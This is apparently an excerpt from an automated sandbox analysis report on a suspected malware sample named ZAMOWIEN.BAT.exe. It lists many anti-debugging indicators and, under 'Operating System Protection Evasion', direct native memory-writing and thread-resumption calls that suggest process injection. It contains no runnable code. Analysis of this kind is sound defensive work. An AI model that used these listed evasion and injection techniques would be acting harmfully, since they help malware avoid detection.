            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]4_2_328115A9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]4_2_328115A9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]4_2_328115A9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]4_2_3281F5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]4_2_328835BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]4_2_328835BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]4_2_328835BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]4_2_328835BA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF5BE mov eax, dword ptr fs:[00000030h]4_2_328AF5BE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3288D5B0 mov eax, dword ptr fs:[00000030h]4_2_3288D5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3288D5B0 mov eax, dword ptr fs:[00000030h]4_2_3288D5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C35B6 mov eax, dword ptr fs:[00000030h]4_2_328C35B6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328255C0 mov eax, dword ptr fs:[00000030h]4_2_328255C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C55C9 mov eax, dword ptr fs:[00000030h]4_2_328C55C9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]4_2_327FD534
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]4_2_327FD534
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]4_2_327FD534
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]4_2_327FD534
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]4_2_327FD534
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]4_2_327FD534
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D5D0 mov eax, dword ptr fs:[00000030h]4_2_3286D5D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D5D0 mov ecx, dword ptr fs:[00000030h]4_2_3286D5D0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C35D7 mov eax, dword ptr fs:[00000030h]4_2_328C35D7
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C35D7 mov eax, dword ptr fs:[00000030h]4_2_328C35D7
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C35D7 mov eax, dword ptr fs:[00000030h]4_2_328C35D7
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328195DA mov eax, dword ptr fs:[00000030h]4_2_328195DA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]4_2_328115F4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]4_2_328115F4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]4_2_328115F4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]4_2_328115F4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]4_2_328115F4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]4_2_328115F4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32827505 mov eax, dword ptr fs:[00000030h]4_2_32827505
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32827505 mov ecx, dword ptr fs:[00000030h]4_2_32827505
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AB52F mov eax, dword ptr fs:[00000030h]4_2_328AB52F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]4_2_3289F525
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282D530 mov eax, dword ptr fs:[00000030h]4_2_3282D530
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282D530 mov eax, dword ptr fs:[00000030h]4_2_3282D530
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C5537 mov eax, dword ptr fs:[00000030h]4_2_328C5537
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B550 mov eax, dword ptr fs:[00000030h]4_2_3289B550
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B550 mov eax, dword ptr fs:[00000030h]4_2_3289B550
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289B550 mov eax, dword ptr fs:[00000030h]4_2_3289B550
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E758F mov eax, dword ptr fs:[00000030h]4_2_327E758F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E758F mov eax, dword ptr fs:[00000030h]4_2_327E758F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E758F mov eax, dword ptr fs:[00000030h]4_2_327E758F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282B570 mov eax, dword ptr fs:[00000030h]4_2_3282B570
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282B570 mov eax, dword ptr fs:[00000030h]4_2_3282B570
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AFA87 mov eax, dword ptr fs:[00000030h]4_2_328AFA87
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289DAAC mov ecx, dword ptr fs:[00000030h]4_2_3289DAAC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289DAAC mov ecx, dword ptr fs:[00000030h]4_2_3289DAAC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289DAAC mov eax, dword ptr fs:[00000030h]4_2_3289DAAC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A1AA3 mov eax, dword ptr fs:[00000030h]4_2_328A1AA3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A1AA3 mov eax, dword ptr fs:[00000030h]4_2_328A1AA3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A1AA3 mov eax, dword ptr fs:[00000030h]4_2_328A1AA3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DAAE mov eax, dword ptr fs:[00000030h]4_2_3281DAAE
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E9A40 mov ecx, dword ptr fs:[00000030h]4_2_327E9A40
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32871ACB mov eax, dword ptr fs:[00000030h]4_2_32871ACB
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32871ACB mov ecx, dword ptr fs:[00000030h]4_2_32871ACB
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]4_2_327FBA30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBA30 mov ecx, dword ptr fs:[00000030h]4_2_327FBA30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]4_2_327FBA30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]4_2_327FBA30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]4_2_327FBA30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]4_2_327FBA30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32885AD0 mov eax, dword ptr fs:[00000030h]4_2_32885AD0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281BADA mov eax, dword ptr fs:[00000030h]4_2_3281BADA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EBA10 mov eax, dword ptr fs:[00000030h]4_2_327EBA10
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]4_2_3289BA0B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]4_2_3289BA0B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]4_2_3289BA0B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]4_2_3289BA0B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32825A01 mov eax, dword ptr fs:[00000030h]4_2_32825A01
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32825A01 mov ecx, dword ptr fs:[00000030h]4_2_32825A01
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32825A01 mov eax, dword ptr fs:[00000030h]4_2_32825A01
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32825A01 mov eax, dword ptr fs:[00000030h]4_2_32825A01
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AFA02 mov eax, dword ptr fs:[00000030h]4_2_328AFA02
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32897A11 mov edi, dword ptr fs:[00000030h]4_2_32897A11
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32819A18 mov ecx, dword ptr fs:[00000030h]4_2_32819A18
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286DA1D mov eax, dword ptr fs:[00000030h]4_2_3286DA1D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EBAE0 mov eax, dword ptr fs:[00000030h]4_2_327EBAE0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DA20 mov eax, dword ptr fs:[00000030h]4_2_3281DA20
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DA20 mov eax, dword ptr fs:[00000030h]4_2_3281DA20
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EFAA4 mov ecx, dword ptr fs:[00000030h]4_2_327EFAA4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBAA0 mov eax, dword ptr fs:[00000030h]4_2_327FBAA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FBAA0 mov eax, dword ptr fs:[00000030h]4_2_327FBAA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]4_2_32883A78
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]4_2_32883A78
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]4_2_32883A78
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]4_2_32883A78
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]4_2_32883A78
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]4_2_32883A78
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E7A80 mov eax, dword ptr fs:[00000030h]4_2_327E7A80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E7A80 mov eax, dword ptr fs:[00000030h]4_2_327E7A80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E7A80 mov eax, dword ptr fs:[00000030h]4_2_327E7A80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B9B8B mov eax, dword ptr fs:[00000030h]4_2_328B9B8B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B9B8B mov eax, dword ptr fs:[00000030h]4_2_328B9B8B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C3B80 mov eax, dword ptr fs:[00000030h]4_2_328C3B80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C3B80 mov eax, dword ptr fs:[00000030h]4_2_328C3B80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C3B80 mov eax, dword ptr fs:[00000030h]4_2_328C3B80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32829B9F mov eax, dword ptr fs:[00000030h]4_2_32829B9F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32829B9F mov eax, dword ptr fs:[00000030h]4_2_32829B9F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32829B9F mov eax, dword ptr fs:[00000030h]4_2_32829B9F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AFB97 mov eax, dword ptr fs:[00000030h]4_2_328AFB97
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]4_2_3281DBA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]4_2_3281DBA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]4_2_3281DBA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]4_2_3281DBA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]4_2_3281DBA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]4_2_3281DBA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EFB4C mov edi, dword ptr fs:[00000030h]4_2_327EFB4C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]4_2_32803BD6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]4_2_32803BD6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]4_2_32803BD6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]4_2_32803BD6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]4_2_32803BD6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287FBDC mov eax, dword ptr fs:[00000030h]4_2_3287FBDC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287FBDC mov eax, dword ptr fs:[00000030h]4_2_3287FBDC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287FBDC mov eax, dword ptr fs:[00000030h]4_2_3287FBDC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32831BEF mov eax, dword ptr fs:[00000030h]4_2_32831BEF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32831BEF mov eax, dword ptr fs:[00000030h]4_2_32831BEF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AFBF3 mov eax, dword ptr fs:[00000030h]4_2_328AFBF3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1B04 mov eax, dword ptr fs:[00000030h]4_2_327F1B04
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F1B04 mov eax, dword ptr fs:[00000030h]4_2_327F1B04
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]4_2_3281DB00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]4_2_3281DB00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]4_2_3281DB00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]4_2_3281DB00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]4_2_3281DB00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281DB00 mov edx, dword ptr fs:[00000030h]4_2_3281DB00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AFB0C mov eax, dword ptr fs:[00000030h]4_2_328AFB0C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C3B10 mov eax, dword ptr fs:[00000030h]4_2_328C3B10
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32829B28 mov eax, dword ptr fs:[00000030h]4_2_32829B28

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
